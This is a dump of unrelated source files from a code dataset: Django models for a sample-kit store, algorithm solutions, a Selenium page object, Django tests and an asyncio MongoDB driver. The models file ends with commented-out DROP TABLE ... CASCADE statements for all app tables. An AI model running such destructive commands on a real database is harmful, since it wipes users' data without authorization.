ClientDB.close()\n\n","sub_path":"bBlackFireCapitalData/StocksMarketData/StocksPriceRecommendationData/GetStocksInfosRecommendations.py","file_name":"GetStocksInfosRecommendations.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"589857058","text":"#count ( < 100 )\ndef less_hundred(n):\n count = 0\n for i in range(n):\n count += 1\n print(count)\n#count ( >= 100 and < 1000)\ndef more_hundred(n):\n count = 99\n for i in range(100, n + 1):\n num = str(i)\n list_n = list(map(int, num))\n if (list_n[0] - list_n[1]) == (list_n[1] - list_n[2]):\n count += 1\n print(count)\n#main\nn = int(input())\n\nif n < 100:\n less_hundred(n)\nelif n == 1000:\n 
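# Aside (editorial, not part of the original solution): this explicit
# n == 1000 special case is redundant but harmless; 1000's digits
# [1, 0, 0, 0] fail the equal-difference test (1 - 0 != 0 - 0), so
# more_hundred(1000) would also print 144.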
print(144)\nelse:\n more_hundred(n)\n","sub_path":"1000~/Baek_1065.py","file_name":"Baek_1065.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"331663590","text":"from django.db import models\nfrom userprofile.models import UserProfile\nimport os\nfrom datetime import date\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom tinymce.models import HTMLField\nfrom amazon_file_field import S3Storage, S3EnabledImageField, S3EnabledFileField\nfrom boto.s3.key import Key\nfrom boto.s3.connection import S3Connection\n#-------------------------------------------------------------->\n# UTILITIES\n\n\ndef get_bucket():\n if settings.USE_AMAZON_S3:\n bucket = settings.AWS_STORAGE_BUCKET_NAME\n connection = S3Connection(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY, host='s3.amazonaws.com')\n if not connection.lookup(bucket):\n connection.create_bucket(bucket)\n bucket = connection.get_bucket(bucket)\n return bucket\n\nUser = settings.AUTH_USER_MODEL\n\n\n# This class is used to create the file system storage used for files on OS.\n# It checks if the file exists and overwrites the file if it exists.\nclass OverwriteStorage(FileSystemStorage):\n\n def get_available_name(self, name):\n \"\"\"\n Returns a filename that's free on the target storage system, and\n available for new content to be written to.\n \"\"\"\n # If the filename already exists, remove it as if it was a true file system\n if self.exists(name):\n os.remove(os.path.join(settings.MEDIA_ROOT, name))\n return name\n\n\nclass CommonInfo(models.Model):\n name = models.CharField(max_length=100)\n\n def __unicode__(self):\n return self.name\n\n class Meta:\n abstract = True\n\n\nclass Price(CommonInfo):\n cost = models.DecimalField(max_digits=10, decimal_places=2)\n\n\nclass Sale(CommonInfo):\n percent_off = models.DecimalField(max_digits=10, decimal_places=2)\n\n\nclass Tag(models.Model):\n name = models.CharField(max_length=50)\n\n def __unicode__(self):\n return self.name\n\n\n#-------------------------------------------------------------->\n# VENDOR KIT\n\ndef upload_vendor_logo(instance, filename):\n vendor_name = instance.name.replace(\" \", \"_\").replace(\"'\", \"\")\n return \"media/vendors/\" + vendor_name + \"/logo/\" + filename\n\ndef upload_vendor_kit_image(instance, filename):\n vendor_name = instance.vendor.name.replace(\" \", \"_\").replace(\"'\", \"\")\n kit_name = instance.name.replace(\" \", \"_\").replace(\"'\", \"\")\n return \"media/vendors/\" + vendor_name + \"/kits/\" + kit_name + \"/\" + filename\n\n\nclass Vendor(CommonInfo):\n website = models.URLField(blank=True, null=True)\n# description = models.ForeignKey(KitDescription) # This should be a WYSIWYG field\n# logo = models.ImageField(upload_to=upload_vendor_logo, storage=S3Storage(get_bucket()))\n logo = S3EnabledImageField(upload_to=upload_vendor_logo)\n facebook = models.URLField(blank=True, null=True)\n twitter = models.URLField(blank=True, null=True)\n google_plus = models.URLField(blank=True, null=True)\n soundcloud = models.URLField(blank=True, null=True)\n\n\nclass VendorKit (CommonInfo):\n active = models.BooleanField(default=True)\n on_sale = models.BooleanField(default=False)\n soundcloud = models.CharField(max_length=500)\n # image = models.ImageField(upload_to=upload_vendor_kit_image, storage=S3Storage(get_bucket()))\n image = S3EnabledImageField(upload_to=upload_vendor_kit_image)\n description = 
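The Baekjoon 1065 snippet above counts hansu: numbers whose decimal digits form an arithmetic progression. A minimal generic sketch of the same predicate (the `is_hansu` name is illustrative, not from the original) that works for any digit length and also confirms the hard-coded `print(144)` branch for n = 1000:

```python
def is_hansu(n):
    # a hansu's digit differences are all equal; 1- and 2-digit numbers
    # qualify trivially (zero or one difference)
    digits = [int(c) for c in str(n)]
    diffs = [b - a for a, b in zip(digits, digits[1:])]
    return len(set(diffs)) <= 1

assert sum(is_hansu(i) for i in range(1, 100)) == 99     # all of 1..99 qualify
assert sum(is_hansu(i) for i in range(1, 1001)) == 144   # 1000 itself is not a hansu
```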
HTMLField(blank=True) # This should be a WYSIWYG field\n date_created = models.DateField(auto_now_add=True, blank=True, null=True)\n sample_count = models.IntegerField(blank=True, null=True)\n commission_rate = models.DecimalField(max_digits=10, decimal_places=2)\n vendor = models.ForeignKey(Vendor)\n tags = models.ManyToManyField(Tag)\n price = models.ForeignKey(Price)\n sale = models.ForeignKey(Sale)\n\n\n#-------------------------------------------------------------->\n# SAMPLE\n\ndef upload_sample_preview(instance, filename):\n vendor_name = instance.vendor_kit.vendor.name.replace(\" \", \"_\").replace(\"'\", \"\")\n kit_name = instance.vendor_kit.name.replace(\" \", \"_\").replace(\"'\", \"\")\n return \"media/vendors/\" + vendor_name + \"/kits/\" + kit_name + \"/samples/preview/\" + filename\n\n\ndef upload_sample_wav(instance, filename):\n vendor_name = instance.vendor_kit.vendor.name.replace(\" \", \"_\").replace(\"'\", \"\")\n kit_name = instance.vendor_kit.name.replace(\" \", \"_\").replace(\"'\", \"\")\n return \"media/vendors/\" + vendor_name + \"/kits/\" + kit_name + \"/samples/wav/\" + filename\n\n\nclass Sample(models.Model):\n KICK = 'Kick'\n SNARE = 'Snare'\n CLAP = 'Clap'\n OVERHEAD = 'Overhead'\n PERCUSSION = 'Percussion'\n SOUNDFX = 'Effect'\n LOOP = 'Loop'\n SAMPLE_TYPE_CHOICES = (\n (KICK, 'Kick'),\n (SNARE, 'Snare'),\n (CLAP, 'Clap'),\n (OVERHEAD, 'Overhead'),\n (PERCUSSION, 'Percussion'),\n (SOUNDFX, 'Effect'),\n (LOOP, 'Loop'),\n )\n name = models.CharField(max_length=50)\n type = models.CharField(max_length=20, choices=SAMPLE_TYPE_CHOICES)\n bpm = models.IntegerField(default=0, blank=True, null=True)\n key = models.CharField(max_length=10, blank=True, null=True)\n preview = models.TextField()\n wav = models.TextField()\n vendor_kit = models.ForeignKey(VendorKit, related_name=\"samples\")\n bucket = get_bucket()\n\n @property\n def s3_preview_url(self):\n return Key(self.bucket, self.preview).generate_url(100000)\n\n @property\n def s3_wav_url(self):\n return Key(self.bucket, self.wav).generate_url(100000)\n\n def __unicode__(self):\n return self.name\n\n\n#-------------------------------------------------------------->\n# KIT BUILDER PURCHASE\n\n\n# doc = UploadedFile()\n# with open(filepath, 'rb') as doc_file:\n# doc.document.save(filename, File(doc_file), save=True)\n# doc.save()\n# \"media\", \"kitbuilder_purchases\", \"user_\"+str(user_id)\n\ndef upload_kitbuilder_purchase_zip(instance, filename):\n # kit_name = instance.name.replace(\" \", \"_\").replace(\"'\", \"\")\n user = instance.user\n return \"media/kitbuilder_purchases/user_\" + str(user.id) + \"/\" + filename\n\n\nclass KitBuilderPurchase(models.Model):\n name = models.CharField(max_length=100)\n date_purchased = models.DateField(auto_now_add=True)\n zip_file = S3EnabledFileField(blank=True, null=True, upload_to=upload_kitbuilder_purchase_zip) # Change this to URL FIELD and ADD COMPUTED PROPERTY\n samples = models.ManyToManyField(Sample, blank=True)\n user = models.ForeignKey(UserProfile, related_name='kitbuilder_purchases')\n\n def __unicode__(self):\n return self.name\n\n\n#-------------------------------------------------------------->\n# KIT BUILDER TEMPLATE\n\ndef upload_template_image(instance, filename):\n user_dir = \"user_\"+str(instance.user.id)\n #template_name = instance.name.replace(\" \", \"_\").replace(\"'\", \"\")\n template_id = instance.id\n return \"media/kb_templates/\" + user_dir + \"/\" + str(template_id) + \"/\" + filename\n\n\nclass KitBuilderTemplate(models.Model):\n name = 
models.CharField(max_length=100)\n last_updated = models.DateField(auto_now=True)\n # times_added = models.IntegerField(default=0)\n description = models.TextField(blank=True)\n featured = models.BooleanField(default=False)\n public = models.BooleanField(default=False)\n # image = models.ImageField(upload_to=upload_template_image, storage=S3Storage(get_bucket()), blank=True, null=True)\n image = S3EnabledImageField(upload_to=upload_template_image, blank=True, null=True)\n user = models.ForeignKey(UserProfile, related_name='kitbuilder_templates')\n samples = models.ManyToManyField(Sample, blank=True)\n tags = models.ManyToManyField(Tag, blank=True)\n users_following = models.ManyToManyField(\n UserProfile,\n blank=True,\n related_name=\"templates_followed\",\n through=\"TemplateFollow\",\n through_fields=('template', 'user')\n )\n\n def __unicode__(self):\n return self.name\n\n\nclass TemplateFollow(models.Model):\n template = models.ForeignKey(KitBuilderTemplate, related_name=\"follows\")\n user = models.ForeignKey(UserProfile, related_name=\"template_follows\")\n date_followed = models.DateField(auto_now_add=True)\n\n def __unicode__(self):\n return self.user.username + \"-follows-\" + self.template.name\n#-------------------------------------------------------------->\n# KIT BUILDER TEMPLATE\n\n######## SIGNALS (for model deletion etc.)\n# Receive the pre_delete signal and delete the file associated with the model instance.\nfrom django.db.models.signals import pre_delete\nfrom django.dispatch.dispatcher import receiver\n\n\n@receiver(pre_delete, sender=Sample)\ndef sample_delete(sender, instance, **kwargs):\n # Pass false so FileField doesn't save the model.\n pass\n # At some point - have to update this signal to delete the file on Amazon automatically\n # instance.preview.delete(False)\n # instance.wav.delete(False)\n\n\n@receiver(pre_delete, sender=VendorKit)\ndef vendor_kit_delete(sender, instance, **kwargs):\n # Pass false so FileField doesn't save the model.\n instance.image.delete(False)\n\n\n@receiver(pre_delete, sender=KitBuilderPurchase)\ndef kitbuilder_purchase_delete(sender, instance, **kwargs):\n # Pass false so FileField doesn't save the model.\n zip_filename = instance.name\n user_id = instance.user.id\n zip_filepath = os.path.join(settings.MEDIA_ROOT, \"kitbuilder_purchases\", \"user_\"+str(user_id), \"%s.zip\" % zip_filename)\n try:\n os.remove(zip_filepath)\n except OSError:\n pass\n\n\n@receiver(pre_delete, sender=KitBuilderTemplate)\ndef kitbuilder_template_delete(sender, instance, **kwargs):\n # Pass false so FileField doesn't save the model.\n instance.image.delete(False)\n\n\n\n# DROP TABLE \"kitbuilder_v1_kitbuildertemplate\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_kitbuildertemplate_samples\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_kitbuildertemplate_tags\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_kitbuilderpurchase\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_kitbuilderpurchase_samples\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_sample\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_vendorkit\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_vendorkit_tags\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_vendor\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_tag\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_sale\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_price\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_follower\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_templatefollow\" 
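The `sample_delete` receiver above is deliberately a no-op, and its inline comment notes that the S3 objects should eventually be removed as well. A hedged sketch of what that cleanup could look like with the `boto` `Key` API this module already imports — the receiver below is an assumption, not the project's actual implementation:

```python
from django.db.models.signals import pre_delete
from django.dispatch.dispatcher import receiver

@receiver(pre_delete, sender=Sample)
def sample_delete_s3(sender, instance, **kwargs):
    # Sample.preview / Sample.wav are TextFields holding the S3 key paths,
    # so each one can be wrapped in a boto Key and deleted from the bucket.
    bucket = get_bucket()
    for key_name in (instance.preview, instance.wav):
        if key_name:
            Key(bucket, key_name).delete()
```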
CASCADE;\n\n","sub_path":"kitbuilder/kitbuilder_v1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"104230880","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n if not head:\n return None\n \n slow, fast = head, head.next\n \n #find mid\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n \n prev = None\n it = slow.next\n slow.next = None\n #reverse 2nd half\n while it:\n next_it = it.next\n it.next = prev\n \n prev = it\n it = next_it\n \n right = prev\n left = head\n \n while left and right:\n next_left = left.next\n left.next = right\n \n next_right = right.next\n right.next = next_left\n \n left = next_left\n right = next_right\n \n \n ","sub_path":"143/143.py","file_name":"143.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373692214","text":"#-*- coding: UTF-8 -*-\nimport time\nimport os\nfrom framework.base_page import BasePage\nfrom selenium.webdriver.common.by import By\nfrom framework import getcwd\n\nclass CJPage(BasePage):\n # 选择模块按钮\n menu = 'xpath=>//a[@href=\"/ApprSynthesis/appr/synthesis/deliver/toDeliverList.do\"]'\n frame1= 'xpath=>//iframe[@src=\"/ApprSynthesis/appr/synthesis/deliver/toDeliverList.do\"]'\n waite_code = (By.XPATH,'//input[@id=\"controlSeq\"]')\n query_code = 'xpath=>//input[@id=\"controlSeq\"]'\n query_button = 'xpath=>//input[@value=\"查 询\"]'\n qianfa = 'xpath=>//font[contains(text(),\"签收发证\")]'\n\n def open_qianfa(self,code): # 打开页面并点击签收发证\n self.execute_js(self.menu)\n time.sleep(2)\n self.select_frame(self.find_element(self.frame1))\n #self.wait_element(self.waite_code)\n self.type(self.query_code,code)\n self.click(self.query_button)\n time.sleep(2)\n self.click(self.qianfa)\n time.sleep(3)\n\n save_button = 'id=>doSave'\n qianshou = 'id=>doCertReceive'\n frame2 =(By.NAME,\"editTransferWin\")\n select_qs = 'xpath=>//a[contains(text(),\"选择移交人\")]'\n frame3 = (By.NAME,\"userSelect\")\n ceshi2 = 'xpath=>//div[contains(text(),\"测试2\")]'\n queding = 'id=>selectedButton'\n submit = 'id=>sumbitButton'\n\n def qs(self): # 出件窗签收\n self.select_windows()\n self.click(self.save_button)\n time.sleep(3)\n self.click(self.qianshou)\n time.sleep(2)\n self.wait_goframe(self.frame2)\n self.click(self.select_qs)\n time.sleep(2)\n self.wait_goframe(self.frame3)\n self.click(self.ceshi2)\n self.click(self.queding)\n time.sleep(1)\n self.wait_goframe(self.frame2)\n self.click(self.submit)\n self.top_windows()\n time.sleep(3)\n\n def get_message1(self):\n message = self.get_element_text(self.fazheng)\n return message\n\n fazheng = 'id=>sendCertificate'\n frame4 = (By.NAME,'sendCertificate')\n fafang = 'id=>sign'\n jiesu = 'id=>doSend'\n sure = 'xpath=>//button[contains(text(),\"确定\")]'\n\n def fz(self): # 发证\n self.click(self.fazheng)\n time.sleep(2)\n self.wait_goframe(self.frame4)\n self.click(self.fafang)\n time.sleep(3)\n\n def get_message2(self):\n message = self.get_element_text(self.jiesu)\n return message\n\n def end(self): # 结束\n self.click(self.jiesu)\n time.sleep(1)\n self.click(self.sure)\n time.sleep(3)\n\n def get_allwindows(self): # 获取全部窗口进行校验是否正常结束流程并关闭窗口\n handles = 
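The `reorderList` solution embedded above works in three phases: locate the middle with slow/fast pointers, reverse the second half in place, then interleave the two halves. A small self-contained check, assuming the snippet's `Solution` class is in scope (the `ListNode` class mirrors the commented-out definition in the snippet):

```python
class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None

def build(values):
    head = cur = ListNode(values[0])
    for v in values[1:]:
        cur.next = ListNode(v)
        cur = cur.next
    return head

def to_list(head):
    out = []
    while head:
        out.append(head.val)
        head = head.next
    return out

head = build([1, 2, 3, 4, 5])
Solution().reorderList(head)            # modifies the list in place
assert to_list(head) == [1, 5, 2, 4, 3]
```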
self.driver.window_handles\n        return handles\n\n","sub_path":"General_Approval/pageobjects/ApprSynthesis/综合窗口出件/CJ_page.py","file_name":"CJ_page.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"479541427","text":"import copy\nimport sys\nN = int(input())\nH = list(map(int, input().split()))\n\nif sorted(H) == H:\n\tprint(\"YES\")\n\tsys.exit()\n\nfor i in range(0, N - 1):\n\tfor j in range(1, N):\n\t\tL = copy.copy(H)\n\t\tL[i], L[j] = L[j], L[i]\n\t\tif L == sorted(H):\n\t\t\tprint(\"YES\")\n\t\t\tsys.exit()\nprint(\"NO\")\n","sub_path":"abc135/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"440500826","text":"from django.test import TestCase\n# from django.core.urlresolvers import resolve\nfrom .models import Item\nfrom django.contrib.auth.models import User\n\n\nclass start():\n    def create_user(self):\n        self.user_in = User.objects.create_user(\n            'khophi',\n            'email@email.com',\n            'password'\n        )\n        # create user khophi\n        self.user_in.save()\n\n    def create_item(self):\n        self.username = User.objects.get(username='khophi')\n        self.item = Item(\n            device='Google Nexus 6',\n            slug='0000000000',\n            type_of_item='md',\n            description='An awesome phone I bought from Google',\n            stolen='s',\n            created_by=self.username\n        )\n        self.item.save()\n\n\n# Check save and retrieve from DB\nclass SaveToDBDirect(TestCase):\n    def setUp(self):\n        begin = start()\n        begin.create_user()\n        begin.create_item()\n\n    def test_check_user_account(self):\n        self.user = User.objects.all()[0]\n\n        # Django's User.__str__ returns the username created in setUp\n        self.assertEqual(str(self.user), 'khophi')\n\n    def test_check_new_item(self):\n        from_db = Item.objects.count()\n\n        self.assertEqual(from_db, 1)\n\n\n# Check request, save and retrieve from DB works via views\n# Non REST\n\nclass TestView(TestCase):\n\n    def test_check_login(self):\n        request = self.client.post('/admin/', {'username': 'khophi', 'password': 'password'})\n        self.assertEqual(request.status_code, 200)\n\n    def test_check_details(self):\n        request = self.client.get('/detail/0000000000')\n        self.assertEqual(request.status_code, 200)\n\n# Check request, save and retrieve from DB works via views\n# REST way\n\n# Check post and get works via browser\n# Mr. 
Selenium comes in\n\n# Searched empty, response \"Not searched for anything\"\n\n# if not stolen, don't show in results\n\n# Mylist count\n\n# Account login, logout\n\n# get_absolute_urls on models\n","sub_path":"main/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"519742320","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n## author : cypro666\n## date : 2015.07.16\nimport struct\nimport asyncio\nfrom collections import defaultdict\nimport bson\nfrom bson import SON, ObjectId, Code\nfrom pymongo import errors, auth\n\"\"\"\nasynchronous driver for mongodb\n\"\"\"\n__all__ = ['Database', 'Collection', 'Connection', 'Pool']\n\n\n_ONE = b\"\\x01\\x00\\x00\\x00\"\n_ZERO = b\"\\x00\\x00\\x00\\x00\"\n\n\nclass _Query(object):\n __slots__ = ('id', 'limit', 'collection', 'documents', 'future')\n def __init__(self, id_, collection, limit):\n \"\"\" init won't check the limit arg validate or not \"\"\"\n self.id = id_\n self.limit = limit\n self.collection = collection\n self.documents = []\n self.future = asyncio.Future()\n\n\nclass _Protocol(asyncio.Protocol):\n __slots__ = ('__id', '__buffer', '__queries', '__datalen', '__response', \n '__waiting_header', '_pipelined_calls', 'transport', '_is_connected')\n def __init__(self):\n self.__id = 0\n self.__buffer = b\"\"\n self.__queries = {}\n self.__datalen = None\n self.__response = 0\n self.__waiting_header = True\n self._pipelined_calls = set() # Set of all the pipelined calls.\n self.transport = None\n self._is_connected = False\n\n def connection_made(self, transport):\n self.transport = transport\n self._is_connected = True\n\n def connection_lost(self, exc):\n self._is_connected = False\n self.transport = None\n\n # Raise exception on all waiting futures.\n for f in self.__queries:\n f.set_exception(errors.ConnectionFailure(exc))\n\n @property\n def is_connected(self):\n \"\"\" True when the underlying transport is connected. 
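Each `_Query` above ties one outgoing request to an `asyncio.Future`: the protocol files it in `__queries` under the request id and resolves the future once every reply batch has arrived. A stripped-down sketch of that bookkeeping in isolation (simplified names, not the module's real wire handling):

```python
import asyncio

class DemoProtocol:
    """Toy version of the request-id -> Future bookkeeping."""
    def __init__(self):
        self.queries = {}   # request id -> pending asyncio.Future
        self.next_id = 0

    def send_query(self, collection, limit=0):
        self.next_id += 1
        fut = asyncio.get_event_loop().create_future()
        self.queries[self.next_id] = fut
        # ...the real protocol would serialize and send OP_QUERY here...
        return fut

    def reply_received(self, request_id, documents):
        # resolving the future wakes whoever is awaiting send_query()'s result
        self.queries.pop(request_id).set_result(documents)

@asyncio.coroutine
def demo():
    proto = DemoProtocol()
    fut = proto.send_query("db.coll")
    proto.reply_received(1, [{"_id": 1}])
    docs = yield from fut
    print(docs)   # [{'_id': 1}]

asyncio.get_event_loop().run_until_complete(demo())
```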
\"\"\"\n        return self._is_connected\n\n    def data_received(self, data):\n        while self.__waiting_header:\n            self.__buffer += data\n            if len(self.__buffer) < 16:\n                break\n\n            # got full header, 16 bytes (or more)\n            header, extra = self.__buffer[:16], self.__buffer[16:]\n            self.__buffer = b\"\"\n            self.__waiting_header = False\n            datalen, request, response, operation = struct.unpack(\"<iiii\", header)\n            self.__datalen = datalen - 16\n            self.__response = response\n            if extra:\n                self.data_received(extra)\n            break\n        else:\n            # accumulate the message body until datalen bytes have arrived\n            if self.__datalen is not None:\n                data, extra = data[:self.__datalen], data[self.__datalen:]\n                self.__datalen -= len(data)\n            else:\n                extra = b\"\"\n            self.__buffer += data\n            if self.__datalen == 0:\n                self.__datalen = None\n                self.__waiting_header = True\n                message, self.__buffer = self.__buffer, b\"\"\n                self.__message_received(self.__response, message)\n                if extra:\n                    self.data_received(extra)\n\n    def __message_received(self, request_id, packet):\n        # OP_REPLY body: flags (int32), cursor_id (int64), starting_from (int32), number_returned (int32)\n        response_flag, cursor_id, starting_from, number_returned = struct.unpack(\"<iqii\", packet[:20])\n        documents = bson.decode_all(packet[20:])\n        query = self.__queries.pop(request_id, None)\n        if query:\n            query.documents += documents\n            if query.limit:\n                next_batch = query.limit - len(query.documents)\n                assert next_batch >= 0, \"Unexpected number of documents received!\"\n                if not next_batch:\n                    self.OP_KILL_CURSORS([cursor_id])\n                    query.future.set_result(query.documents)\n                    return\n                self.__queries[self.__id] = query\n                self.OP_GET_MORE(query.collection, next_batch, cursor_id)\n            else:\n                query.future.set_result(query.documents)\n\n\ndef _DIRECTION(keys, direction):\n    if isinstance(keys, str):\n        return (keys, direction),\n    elif isinstance(keys, (list, tuple)):\n        return tuple([(k, direction) for k in keys])\n\ndef ASCENDING(keys):\n    \"\"\"Ascending sort order\"\"\"\n    return _DIRECTION(keys, 1)\n\n\ndef DESCENDING(keys):\n    \"\"\"Descending sort order\"\"\"\n    return _DIRECTION(keys, -1)\n\n\ndef GEO2D(keys):\n    \"\"\"\n    Two-dimensional geospatial index\n    \"\"\"\n    return _DIRECTION(keys, \"2d\")\n\n\ndef GEOHAYSTACK(keys):\n    \"\"\"\n    Bucket-based geospatial index\n    \"\"\"\n    return _DIRECTION(keys, \"geoHaystack\")\n\n\nclass _QueryFilter(defaultdict):\n    def __init__(self):\n        defaultdict.__init__(self, lambda: ())\n\n    def __add__(self, obj):\n        for k, v in obj.items():\n            if isinstance(v, tuple):\n                self[k] += v\n            else:\n                self[k] = v\n        return self\n\n    def _index_document(self, operation, index_list):\n        name = self.__class__.__name__\n        try:\n            assert isinstance(index_list, (list, tuple))\n            for key, direction in index_list:\n                if not isinstance(key, str):\n                    raise TypeError(\"Invalid %sing key: %s\" % (name, repr(key)))\n                if direction not in (1, -1, \"2d\", \"geoHaystack\"):\n                    raise TypeError(\"Invalid %sing direction: %s\" % (name, direction))\n                self[operation] += tuple(((key, direction),))\n        except Exception:\n            raise TypeError(\"Invalid list of keys for %s: %s\" % (name, repr(index_list)))\n\n    def __repr__(self):\n        return \"<QueryFilter: %s>\" % dict.__repr__(self)\n\n\nclass _Sort(_QueryFilter):\n    \"\"\"Sorts the results of a query.\"\"\"\n\n    def __init__(self, key_list):\n        _QueryFilter.__init__(self)\n        try:\n            assert isinstance(key_list[0], (list, tuple))\n        except:\n            key_list = (key_list,)\n        self._index_document(\"orderby\", key_list)\n\n\nclass _Hint(_QueryFilter):\n    \"\"\"Adds a `hint`, telling Mongo the proper index to use for the query.\"\"\"\n\n    def __init__(self, index_list):\n        _QueryFilter.__init__(self)\n        try:\n            assert isinstance(index_list[0], (list, tuple))\n        except:\n            index_list = (index_list,)\n        self._index_document(\"$hint\", index_list)\n\n\nclass _Explain(_QueryFilter):\n    \"\"\"Returns an explain plan for the query.\"\"\"\n\n    def __init__(self):\n        _QueryFilter.__init__(self)\n        self[\"explain\"] = True\n\n\nclass _Snapshot(_QueryFilter):\n    def __init__(self):\n        _QueryFilter.__init__(self)\n        self[\"snapshot\"] = True\n\n\n\nclass Collection(object):\n    \"\"\" Wrapper of all operations on mongo collections \"\"\"\n    def __init__(self, database, name):\n        if not isinstance(name, str):\n            raise TypeError(\"name must be an instance of str\")\n        if not name or \"..\" in name:\n            raise errors.InvalidName(\"collection names cannot be empty\")\n        if \"$\" in name and not (name.startswith(\"oplog.$main\") or\n                name.startswith(\"$cmd\")):\n            raise errors.InvalidName(\"collection names must not contain '$': %r\" % name)\n        if name[0] == \".\" or name[-1] == \".\":\n            raise 
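The `_DIRECTION` helper and the `_QueryFilter` subclasses above only build the special query document MongoDB expects; a sort spec, for example, ends up under `orderby`. A short illustration of what these filters evaluate to:

```python
# ASCENDING("age") -> (("age", 1),), i.e. a tuple of key/direction pairs
sort_filter = _Sort(ASCENDING("age") + DESCENDING("name"))
print(dict(sort_filter))   # {'orderby': (('age', 1), ('name', -1))}

hint_filter = _Hint([("age", 1)])
print(dict(hint_filter))   # {'$hint': (('age', 1),)}
```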
errors.InvalidName(\"collection names must not start or end with '.': %r\" % name)\n if \"\\x00\" in name:\n raise errors.InvalidName(\"collection names must not contain the null character\")\n\n self._database = database\n self._collection_name = name\n\n def __str__(self):\n return \"%s.%s\" % (str(self._database), self._collection_name)\n\n def __repr__(self):\n return \"\" % str(self)\n\n def __getitem__(self, collection_name):\n return Collection(self._database, \"%s.%s\" % (self._collection_name, collection_name))\n\n def __eq__(self, other):\n if isinstance(other, Collection):\n return (self._database, self._collection_name) == (other._database, other._collection_name)\n return NotImplemented\n\n def __hash__(self):\n return self._collection_name.__hash__()\n\n def __getattr__(self, collection_name):\n return self[collection_name]\n\n def __call__(self, collection_name):\n return self[collection_name]\n\n def _fields_list_to_dict(self, fields):\n \"\"\"\n transform a list of fields from [\"a\", \"b\"] to {\"a\":1, \"b\":1}\n \"\"\"\n as_dict = {}\n for field in fields:\n if not isinstance(field, str):\n raise TypeError(\"fields must be a list of key names\")\n as_dict[field] = 1\n return as_dict\n\n def _gen_index_name(self, keys):\n return u\"_\".join([u\"%s_%s\" % item for item in keys])\n\n @asyncio.coroutine\n def options(self):\n result = yield from self._database.system.namespaces.find_one({\"name\": str(self)})\n if result:\n options = result.get(\"options\", {})\n if \"create\" in options:\n del options[\"create\"]\n return options\n return {}\n\n @asyncio.coroutine\n def find(self, spec=None, skip=0, limit=0, fields=None, filter=None, _proto=None):\n if spec is None:\n spec = SON()\n\n if not isinstance(spec, dict):\n raise TypeError(\"spec must be an instance of dict\")\n if fields is not None and not isinstance(fields, (dict, list)):\n raise TypeError(\"fields must be an instance of dict or list\")\n if not isinstance(skip, int):\n raise TypeError(\"skip must be an instance of int\")\n if not isinstance(limit, int):\n raise TypeError(\"limit must be an instance of int\")\n\n if fields is not None:\n if not isinstance(fields, dict):\n if not fields:\n fields = [\"_id\"]\n fields = self._fields_list_to_dict(fields)\n\n if isinstance(filter, (_Sort, _Hint, _Explain, _Snapshot)):\n spec = SON(dict(query=spec))\n for k, v in filter.items():\n spec[k] = isinstance(v, tuple) and SON(v) or v\n\n # send the command through a specific connection\n # this is required for the connection pool to work\n # when safe=True\n if _proto is None:\n proto = self._database._protocol\n else:\n proto = _proto\n return (yield from proto.OP_QUERY(str(self), spec, skip, limit, fields))\n\n @asyncio.coroutine\n def find_one(self, spec=None, fields=None, _proto=None):\n if isinstance(spec, ObjectId):\n spec = SON(dict(_id=spec))\n\n docs = yield from self.find(spec, limit=-1, fields=fields, _proto=_proto)\n doc = docs and docs[0] or {}\n if doc.get(\"err\") is not None:\n if doc.get(\"code\") == 11000:\n raise errors.DuplicateKeyError\n else:\n raise errors.OperationFailure(doc)\n else:\n return doc\n\n @asyncio.coroutine\n def count(self, spec=None, fields=None):\n if fields is not None:\n if not fields:\n fields = [\"_id\"]\n fields = self._fields_list_to_dict(fields)\n spec = SON([(\"count\", self._collection_name),\n (\"query\", spec or SON()),\n (\"fields\", fields)])\n result = yield from self._database[\"$cmd\"].find_one(spec)\n return result[\"n\"]\n\n @asyncio.coroutine\n def group(self, 
